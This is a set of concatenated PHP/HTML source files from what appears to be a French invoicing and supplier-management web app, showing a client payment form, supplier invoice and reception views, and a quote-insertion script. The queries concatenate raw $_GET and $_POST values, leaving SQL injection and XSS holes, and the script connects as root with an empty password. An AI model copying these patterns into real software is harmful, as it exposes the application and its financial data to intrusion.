<input type="text" placeholder="Numéro de TVA" class="form-control no-boarder " name="num_tva" id="txtCountry" value="<?php echo $donnee_client['num_tva']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<label>Encours Disponible</label>
<input type="text" placeholder="Encours disponible" class="form-control no-boarder " name="encour" id="txtCountry" value="<?php echo $donnee_client['encour']; ?>">
</div>
</div>
</div>
<div class="tab-pane" id="tab3"> <br>
<h4 class="semi-bold">Etape 3 - <span class="light">Information de Paiement</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<label>Mode De paiement par default</label>
<select name="mode_paiement_default" class="form-control no-boarder " placeholder="mode_paiement_default" value="<?php echo $donnee_client['mode_paiement_default']; ?>">
<option value="1">CB Comptant</option>
<option value="2">CB Différé</option>
<option value="3">Chèque Comptant</option>
<option value="4">Chèque Différé</option>
<option value="5">Virement</option>
<option value="6">Prélèvement</option>
<option value="7">Paypal</option>
</select>
</div>
</div>
<h5>RIB</h5>
<div class="row form-row">
<div class="col-md-2">
<input type="text" placeholder="Banque" class="form-control no-boarder " name="code_banque" id="txtCountry" value="<?php echo $donnee_client['code_banque']; ?>">
</div>
<div class="col-md-2">
<input type="text" placeholder="Guichet" class="form-control no-boarder " name="code_guichet" id="txtCountry" value="<?php echo $donnee_client['code_guichet']; ?>">
</div>
<div class="col-md-6">
<input type="text" placeholder="Numéro de Compte" class="form-control no-boarder " name="code_cpt" id="txtCountry" value="<?php echo $donnee_client['code_cpt']; ?>">
</div>
<div class="col-md-2">
<input type="text" placeholder="Clé rib" class="form-control no-boarder " name="cle_rib" id="txtCountry" value="<?php echo $donnee_client['cle_rib']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-8">
<input type="text" placeholder="IBAN" class="form-control no-boarder " name="iban" id="txtCountry"value="<?php echo $donnee_client['iban']; ?>">
</div>
<div class="col-md-4">
<input type="text" placeholder="BIC" class="form-control no-boarder " name="bic" id="txtCountry" value="<?php echo $donnee_client['bic']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-8">
<label>Paypal</label>
<input type="text" placeholder="Adresse Utiliser pour Paypal" class="form-control no-boarder " name="mail_paypal" id="txtCountry" value="<?php echo $donnee_client['mail_paypal']; ?>">
</div>
</div>
<button class="btn btn-primary btn-cons" type="submit">Valider</button>
<button class="btn btn-danger btn-cons" type="reset">Reset</button>
</div>
<ul class=" wizard wizard-actions">
<li class="previous first" style="display:none;"><a href="javascript:;" class="btn"> First </a></li>
<li class="previous"><a href="javascript:;" class="btn"> Previous </a></li>
<li class="next last" style="display:none;"><a href="javascript:;" class="btn btn-primary"> Last </a></li>
<li class="next"><a href="javascript:;" class="btn btn-primary"> Next </a></li>
</ul>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/js/bootstrap-datepicker.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/boostrap-form-wizard/js/jquery.bootstrap.wizard.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-validation/js/jquery.validate.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-inputmask/jquery.inputmask.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/form_validations.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idfactfour = $_GET['idfactfour'];
$sql_societe = mysql_query("SELECT * FROM societe WHERE idsociete = 1");
$sql_fact_four = mysql_query("SELECT * FROM fournisseur, fact_four, article WHERE fact_four.idfournisseur = fournisseur.idfournisseur AND idfactfour=".$idfactfour);
$sql_reglement_fact_four = mysql_query("SELECT * FROM reg_fact_four WHERE reg_fact_four.idfactfour = fact_four.idfactfour AND idfactfour=".$idfactfour);
$donnee_societe = mysql_fetch_array($sql_societe);
$donnee_fact_four = mysql_fetch_array($sql_fact_four);
$donnee_reg_fact_four = mysql_fetch_array($sql_reglement_fact_four);
$reg_fact = $donnee_reg_fact_four['montant_reg1']+$donnee_reg_fact_four['montant_reg2']+$donnee_reg_fact_four['montant_reg3'];
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="row">
<div class="col-md-11">
<div class="grid simple">
<div class="grid-body no-border invoice-body"> <br>
<div class="pull-left"> <img src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src-retina="<?php echo $rootsite; ?>assets/img/invoicelogo2x.png" width="222" height="31" class="invoice-logo" alt="">
<address>
<strong><?php echo $donnee_societe['raison_social']; ?></strong><br>
<?php echo $donnee_societe['adresse1']; ?><br>
<?php echo $donnee_societe['cp']; ?> <?php echo $donnee_societe['ville']; ?><br>
<abbr title="Phone">Téléphone:</abbr> <?php echo $donnee_societe['tel']; ?><br>
<abbr title="Mail">Mail:</abbr><?php echo $donnee_societe['mail']; ?>
</address>
</div>
<div class="pull-right">
<h2>FACTURE</h2><b>
<h6>Fournisseur</h6>
</div>
<div class="clearfix"></div>
<br>
<br>
<br>
<div class="row">
<div class="col-md-9">
<h1>
</div>
<div class="col-md-3"> <br>
<div>
<div class="pull-left"> FACTURE N° : </div>
<div class="pull-right"> FACTFOUR000<?php echo $donnee_fact_four['idfactfour']; ?> </div>
<div class="clearfix"></div>
</div>
<div>
<div class="pull-left"> DATE DE LA FACTURE : </div>
<div class="pull-right"> <?php echo $donnee_fact_four['date_fact_four']; ?> </div>
<div class="clearfix"></div>
</div>
<br>
<div class="well well-small yellow">
<div class="pull-left"> DATE DE D'ECHEANCE: </div>
<div class="pull-right"> <?php echo $donnee_fact_four['date_echeance_fact_four']; ?> </div>
<div class="clearfix"></div>
</div>
<b>
<div class="well well-small green">
<div class="pull-left"> MONTANT TOTAL DE LA FACTURE: </div>
<div class="pull-right"> <?php echo $donnee_fact_four['ptttc_fact_four']; ?> EUR </div>
<div class="clearfix"></div>
</div>
</div>
</div>
<table class="table">
<thead>
<tr>
<th class="text-left">DESCRIPTION</th>
<th style="width:30px">QTE</th>
<th style="width:140px" class="text-right">Prix Unitaire HT</th>
<th style="width:90px" class="text-right">Total HT</th>
</tr>
</thead>
<tbody>
<?php
if($donnee_fact_four['art1'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art1']; ?></td>
<td><?php echo $donnee_fact_four['qte1']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht1']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht1'] * $donnee_fact_four['qte1']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art2'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art2']; ?></td>
<td><?php echo $donnee_fact_four['qte2']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht2']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht2'] * $donnee_fact_four['qte2']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art3'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art3']; ?></td>
<td><?php echo $donnee_fact_four['qte3']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht3']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht3'] * $donnee_fact_four['qte3']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art4'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art4']; ?></td>
<td><?php echo $donnee_fact_four['qte4']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht4']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht4'] * $donnee_fact_four['qte4']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art5'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art5']; ?></td>
<td><?php echo $donnee_fact_four['qte5']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht5']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht5'] * $donnee_fact_four['qte5']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art6'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art6']; ?></td>
<td><?php echo $donnee_fact_four['qte6']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht6']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht6'] * $donnee_fact_four['qte6']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art7'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art7']; ?></td>
<td><?php echo $donnee_fact_four['qte7']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht7']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht7'] * $donnee_fact_four['qte7']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art8'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art8']; ?></td>
<td><?php echo $donnee_fact_four['qte8']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht8']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht8'] * $donnee_fact_four['qte1']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art9'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art9']; ?></td>
<td><?php echo $donnee_fact_four['qte9']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht9']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht9'] * $donnee_fact_four['qte9']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art10'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art10']; ?></td>
<td><?php echo $donnee_fact_four['qte10']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht10']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht10'] * $donnee_fact_four['qte10']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art11'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art11']; ?></td>
<td><?php echo $donnee_fact_four['qte11']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht11']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht11'] * $donnee_fact_four['qte11']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_fact_four['art12'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_fact_four['art12']; ?></td>
<td><?php echo $donnee_fact_four['qte12']; ?></td>
<td class="text-right"><?php echo $donnee_fact_four['pvht12']; ?> €</td>
<td class="text-right"><?php echo $donnee_fact_four['pvht12'] * $donnee_fact_four['qte12']; ?> €</td>
</tr>
<?php } ?><br><br><br><br>
<tr></tr>
<tr>
<td colspan="2" rowspan="4" ><h4 class="semi-bold">Extrait des Conditions générales de Ventes</h4>
<p>Si votre paiement execede les 30 jours, le taux d'interet est fixé à 1,5% par jours passée.</p>
<h5 class="text-right semi-bold"></h5></td>
<td class="text-right"><strong>Frais de Port</strong></td>
<td class="text-right"><?php echo $donnee_fact_four['port']; ?> €</td>
</tr>
<td class="text-right no-border"><strong>Remise</strong></td>
<td class="text-right"><?php echo $donnee_fact_four['remise']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Total HT</strong></td>
<td class="text-right"><?php echo $donnee_fact_four['ptht_fact_four']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Total TVA</strong></td>
<td class="text-right"><?php echo $donnee_fact_four['taxe_fact_four']; ?> €</td>
</tr>
<tr>
<td></td>
<td></td>
<td class="text-right no-border"><div class="well well-small green"><strong>Total TTC</strong></div></td>
<td class="text-right"><strong><?php echo $donnee_fact_four['ptttc_fact_four']; ?> €</strong></td>
</tr>
<tr>
<td></td>
<td></td>
<td class="text-right no-border"><strong>Votre Réglement</strong></td>
<td class="text-right"><?php echo $reg_fact; ?> €</td>
</tr>
</tbody>
</table>
<br>
<br>
<br>
<br>
</div>
</div>
</div>
<div class="col-md-1">
<div class="invoice-button-action-set">
<p>
<a href="pdf.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-info" type="button"><i class="fa fa-print"></i></button></a>
</p>
<p>
<a href="reg.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-success" type="button"><i class="fa fa-credit-card"></i></button></a>
</p>
<div aria-hidden="true" aria-labelledby="myModalLabel" role="dialog" tabindex="-1" id="transfere" class="modal fade" style="display: none;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
<br>
<i id="icon-resize" class="fa fa-exchange fa fa-6x custom-icon-space"></i>
<h4 class="semi-bold" id="myModalLabel">Transfere</h4>
<p class="no-margin">Transferer Cette Commande en Bon de Livraison ! </p>
<br>
</div>
<div class="modal-body">
<center>
<i id="animate-icon" class="fa fa-spinner fa fa-9x fa-spin"></i><br>
<p><h3>Transfere du Bon de Reception <b>N°RECFOUR000<?php echo $donnee_fact_four['idfactfour']; ?></b> vers FACTURE <b>N° FACTFOUR000<?php echo $donnee_fact_four['idfactfour']; ?></b> en cours...</h3></p>
</center>
</div>
<div class="modal-footer">
<button data-dismiss="modal" class="btn btn-warning" type="button">Annuler</button>
<a href="transfere.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"> <button class="btn btn-primary" type="button">Transfere</button></a>
</div>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idreceptionfour = $_GET['idreceptionfour'];
$sql_societe = mysql_query("SELECT * FROM societe WHERE idsociete = 1");
$sql_reception_four = mysql_query("SELECT * FROM fournisseur, reception_four, article WHERE reception_four.idfournisseur = fournisseur.idfournisseur AND idreceptionfour=".$idreceptionfour);
$donnee_societe = mysql_fetch_array($sql_societe);
$donnee_reception_four = mysql_fetch_array($sql_reception_four);
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="row">
<div class="col-md-11">
<div class="grid simple">
<div class="grid-body no-border invoice-body"> <br>
<div class="pull-left"> <img src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src-retina="<?php echo $rootsite; ?>assets/img/invoicelogo2x.png" width="222" height="31" class="invoice-logo" alt="">
<address>
<strong><?php echo $donnee_societe['raison_social']; ?></strong><br>
<?php echo $donnee_societe['adresse1']; ?><br>
<?php echo $donnee_societe['cp']; ?> <?php echo $donnee_societe['ville']; ?><br>
<abbr title="Phone">Téléphone:</abbr> <?php echo $donnee_societe['tel']; ?><br>
<abbr title="Mail">Mail:</abbr><?php echo $donnee_societe['mail']; ?>
</address>
</div>
<div class="pull-right">
<h2>BON DE RECEPTION</h2><b>
<h6>Fournisseur</h6>
</div>
<div class="clearfix"></div>
<br>
<br>
<br>
<div class="row">
<div class="col-md-9">
<h1>
</div>
<div class="col-md-3"> <br>
<div>
<div class="pull-left"> BON DE RECEPTION N° : </div>
<div class="pull-right"> CMDFOUR000<?php echo $donnee_reception_four['idreceptionfour']; ?> </div>
<div class="clearfix"></div>
</div>
<div>
<div class="pull-left"> DATE DE LA RECEPTION : </div>
<div class="pull-right"> <?php echo $donnee_reception_four['date_reception_four']; ?> </div>
<div class="clearfix"></div>
</div>
<br>
</div>
</div>
<table class="table">
<thead>
<tr>
<th class="text-left">DESCRIPTION</th>
<th style="width:30px">QTE</th>
</tr>
</thead>
<tbody>
<?php
if($donnee_reception_four['art1'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art1']; ?></td>
<td><?php echo $donnee_reception_four['qte1']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art2'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art2']; ?></td>
<td><?php echo $donnee_reception_four['qte2']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art3'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art3']; ?></td>
<td><?php echo $donnee_reception_four['qte3']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art4'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art4']; ?></td>
<td><?php echo $donnee_reception_four['qte4']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art5'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art5']; ?></td>
<td><?php echo $donnee_reception_four['qte5']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art6'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art6']; ?></td>
<td><?php echo $donnee_reception_four['qte6']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art7'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art7']; ?></td>
<td><?php echo $donnee_reception_four['qte7']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art8'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art8']; ?></td>
<td><?php echo $donnee_reception_four['qte8']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art9'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art9']; ?></td>
<td><?php echo $donnee_reception_four['qte9']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art10'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art10']; ?></td>
<td><?php echo $donnee_reception_four['qte10']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art11'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art11']; ?></td>
<td><?php echo $donnee_reception_four['qte11']; ?></td>
</tr>
<?php } ?>
<?php
if($donnee_reception_four['art12'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_reception_four['art12']; ?></td>
<td><?php echo $donnee_reception_four['qte12']; ?></td>
</tr>
<?php } ?><br><br><br><br>
<tr></tr>
</tbody>
</table>
<br>
<br>
<br>
<br>
</div>
</div>
</div>
<div class="col-md-1">
<div class="invoice-button-action-set">
<p>
<a href="pdf.reception.php?idcmdfour=<?php echo $donnee_reception_four['idreceptionfour']; ?>"><button class="btn btn-info" type="button"><i class="fa fa-print"></i></button></a>
</p>
<p>
<button class="btn btn-danger" type="button" data-target="#transfere" data-toggle="modal"><i class="fa fa-exchange"></i></button>
</p>
<div aria-hidden="true" aria-labelledby="myModalLabel" role="dialog" tabindex="-1" id="transfere" class="modal fade" style="display: none;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
<br>
<i id="icon-resize" class="fa fa-exchange fa fa-6x custom-icon-space"></i>
<h4 class="semi-bold" id="myModalLabel">Transfere</h4>
<p class="no-margin">Transferer ce Bon de Reception en Facture ! </p>
<br>
</div>
<div class="modal-body">
<center>
<i id="animate-icon" class="fa fa-spinner fa fa-9x fa-spin"></i><br>
<p><h3>Transfere de la Reception <b>N°RECFOUR000<?php echo $donnee_reception_four['idreceptionfour']; ?></b> vers FACTURE <b>N° FACFOUR000<?php echo $donnee_reception_four['idreceptionfour']; ?></b> en cours...</h3></p>
</center>
</div>
<div class="modal-footer">
<button data-dismiss="modal" class="btn btn-warning" type="button">Annuler</button>
<a href="transfere.reception.php?idreceptionfour=<?php echo $donnee_reception_four['idreceptionfour']; ?>"> <button class="btn btn-primary" type="button">Transfere</button></a>
</div>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
$idfournisseur = $_POST['idfournisseur'];
$date_devis_four = $_POST['date_devis_four'];
$date_echeance_devis_four = $_POST['date_echeance_devis_four'];
$idarticle1 = $_POST['idarticle1'];
$idarticle2 = $_POST['idarticle2'];
$idarticle3 = $_POST['idarticle3'];
$idarticle4 = $_POST['idarticle4'];
$idarticle5 = $_POST['idarticle5'];
$idarticle6 = $_POST['idarticle6'];
$idarticle7 = $_POST['idarticle7'];
$idarticle8 = $_POST['idarticle8'];
$idarticle9 = $_POST['idarticle9'];
$idarticle10 = $_POST['idarticle10'];
$idarticle11 = $_POST['idarticle11'];
$idarticle12 = $_POST['idarticle12'];
$qte1 = $_POST['qte1'];
$qte2 = $_POST['qte2'];
$qte3 = $_POST['qte3'];
$qte4 = $_POST['qte4'];
$qte5 = $_POST['qte5'];
$qte6 = $_POST['qte6'];
$qte7 = $_POST['qte7'];
$qte8 = $_POST['qte8'];
$qte9 = $_POST['qte9'];
$qte10 = $_POST['qte10'];
$qte11 = $_POST['qte11'];
$qte12 = $_POST['qte12'];
$pvht1 = $_POST['prix_vente_ht1'];
$pvht2 = $_POST['prix_vente_ht2'];
$pvht3 = $_POST['prix_vente_ht3'];
$pvht4 = $_POST['prix_vente_ht4'];
$pvht5 = $_POST['prix_vente_ht5'];
$pvht6 = $_POST['prix_vente_ht6'];
$pvht7 = $_POST['prix_vente_ht7'];
$pvht8 = $_POST['prix_vente_ht8'];
$pvht9 = $_POST['prix_vente_ht9'];
$pvht10 = $_POST['prix_vente_ht10'];
$pvht11 = $_POST['prix_vente_ht11'];
$pvht12 = $_POST['prix_vente_ht12'];
$remise = $_POST['remise'];
$port = $_POST['port'];
$eco_part = $_POST['eco-part'];
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$ptht_devis_four = ($pvht1*$qte1)+($pvht2*$qte2)+($pvht3*$qte3)+($pvht4*$qte4)+($pvht5*$qte5)+($pvht6*$qte6)+($pvht7*$qte7)+($pvht8*$qte8)+($pvht9*$qte9)+($pvht10*$qte10)+($pvht11*$qte11)+($pvht12*$qte12)+$port+$eco_part-$remise;
$tva = $ptht_devis_four*20/100;
$ptttc_devis_four = $ptht_devis_four+$tva;
$sql_devis_four = "INSERT INTO `devis_four`(`iddevisfour`, `idfournisseur`, `date_devis_four`, `etat_devis_four`, `date_echeance_devis_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`, `pvht1`, `pvht2`, `pvht3`, `pvht4`, `pvht5`, `pvht6`, `pvht7`, `pvht8`, `pvht9`, `pvht10`, `pvht11`, `pvht12`, `port`, `remise`, `eco-part`, `ptht_devis_four`, `taxedevisfour`, `ptttc_devis_four`)
VALUES ('','$idfournisseur','$date_devis_four','1','$date_echeance_devis_four','$idarticle1','$qte1','$idarticle2','$qte2','$idarticle3','$qte3','$idarticle4','$qte4','$idarticle5','$qte5','$idarticle6','$qte6','$idarticle7','$qte7',
'$idarticle8','$qte8','$idarticle9','$qte9','$idarticle10','$qte10','$idarticle11','$qte11','$idarticle12','$qte12','$pvht1','$pvht2','$pvht3','$pvht4','$pvht5','$pvht6','$pvht7','$pvht8','$pvht9','$pvht10','$pvht11',
'$pvht12','$port','$remise','$eco_part','$ptht_devis_four','$tva','$ptttc_devis_four')";
mysql_query($sql_devis_four);
echo $sql_devis_four;
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
